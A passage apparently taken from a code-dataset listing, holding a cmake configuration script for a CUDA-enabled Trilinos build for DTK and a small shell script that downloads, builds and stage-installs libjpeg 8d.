# (DTK): Serial+OpenMP+CUDA Kokkos/Tpetra stacks with explicit template
# instantiation. The actual cmake invocation is assembled into $cmake_cmd and
# presumably executed by the sourced postamble — confirm against
# ~/.personal/package_configs/postamble.
# NOTE(review): EXTRA_ARGS=$@ flattens all caller arguments into one string,
# so arguments containing spaces will be re-split later — acceptable for
# simple -DFOO=bar overrides, broken for quoted paths.
EXTRA_ARGS=$@
# Shared setup (environment, module loads, etc.) — defined externally.
source $HOME/.personal/package_configs/preamble
# Default to the parent directory as the Trilinos source tree unless the
# caller exported TRILINOS_DIR.
TRILINOS_DIR="${TRILINOS_DIR:-$(pwd)/..}"
ARGS=(
-D CMAKE_BUILD_TYPE=RelWithDebInfo
-D CMAKE_INSTALL_PREFIX=$HOME/local/opt/trilinos-dtk/
-D BUILD_SHARED_LIBS=ON
### COMPILERS AND FLAGS ###
-D CMAKE_CXX_COMPILER_LAUNCHER=ccache
-D CMAKE_CXX_STANDARD=14
-D Trilinos_TPL_SYSTEM_INCLUDE_DIRS=ON
-D Trilinos_ENABLE_Fortran=OFF
### TPLS ###
-D TPL_ENABLE_MPI=ON
### ETI ###
-D Trilinos_ENABLE_EXPLICIT_INSTANTIATION=ON
# Serial
-D Kokkos_ENABLE_SERIAL=ON
-D Tpetra_INST_SERIAL=ON
# OpenMP
-D Trilinos_ENABLE_OpenMP=ON
-D Kokkos_ENABLE_OPENMP=ON
-D Tpetra_INST_OPENMP=ON
# CUDA
-D TPL_ENABLE_CUDA=ON
# nvcc_wrapper forwards host-compiler flags to nvcc; required when building
# Kokkos CUDA code through CMake's CXX compiler slot.
-D CMAKE_CXX_COMPILER="${TRILINOS_DIR}/packages/kokkos/bin/nvcc_wrapper"
-D Kokkos_ENABLE_CUDA=ON
-D Kokkos_ENABLE_CUDA_UVM=ON
-D Kokkos_ENABLE_CUDA_LAMBDA=ON
# Target GPU architecture: Pascal, compute capability 6.1.
-D Kokkos_ARCH_PASCAL61=ON
### PACKAGES CONFIGURATION ###
# Opt-in package selection: disable everything, then enable only the
# packages DTK needs (Intrepid2/Kokkos/Teuchos/Tpetra); Epetra explicitly off.
-D Trilinos_ENABLE_ALL_PACKAGES=OFF
-D Trilinos_ENABLE_ALL_OPTIONAL_PACKAGES=OFF
-D Trilinos_ASSERT_MISSING_PACKAGES=OFF
-D Trilinos_ENABLE_TESTS=OFF
-D Trilinos_ENABLE_EXAMPLES=OFF
-D Trilinos_ENABLE_Epetra=OFF
-D Trilinos_ENABLE_Intrepid2=ON
-D Trilinos_ENABLE_Kokkos=ON
-D Trilinos_ENABLE_Teuchos=ON
-D Trilinos_ENABLE_Tpetra=ON
)
# Assemble the command as a flat string; the sourced postamble is expected to
# run it (and possibly log/echo it) — do not rename cmake_cmd.
cmake_cmd="cmake -GNinja ${ARGS[@]} $EXTRA_ARGS ${TRILINOS_DIR}"
source $HOME/.personal/package_configs/postamble
| true
|
132ffc72cc7609c8e1b4eed7f5245f7af25a4750
|
Shell
|
asiekierka/twili
|
/pkgs/libjpeg/build.sh
|
UTF-8
| 239
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/sh
# Download, build, and stage-install IJG libjpeg into the DESTDIR given as $1.
#
# Usage: build.sh DESTDIR
#
# Set -e in the body (not only the shebang) so it survives being invoked as
# 'sh build.sh', where shebang options are ignored.
set -e

VER=8d

# Guard against a missing/empty DESTDIR: 'make DESTDIR= install' would write
# straight into the live filesystem root.
if [ -z "$1" ]; then
    echo "usage: $0 DESTDIR" >&2
    exit 1
fi

# Fetch the tarball only if it is not already cached in the working dir.
test -e "jpegsrc.v$VER.tar.gz" || wget "http://www.ijg.org/files/jpegsrc.v$VER.tar.gz"

# Unpack into a clean tree, build, and install into the staging dir.
rm -rf "jpeg-$VER"
tar -xf "jpegsrc.v$VER.tar.gz"
cd "jpeg-$VER"
./configure --prefix=/
make
make DESTDIR="$1" install

# Clean up the extracted source tree (the tarball is kept as a cache).
cd ..
rm -rf "jpeg-$VER"
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.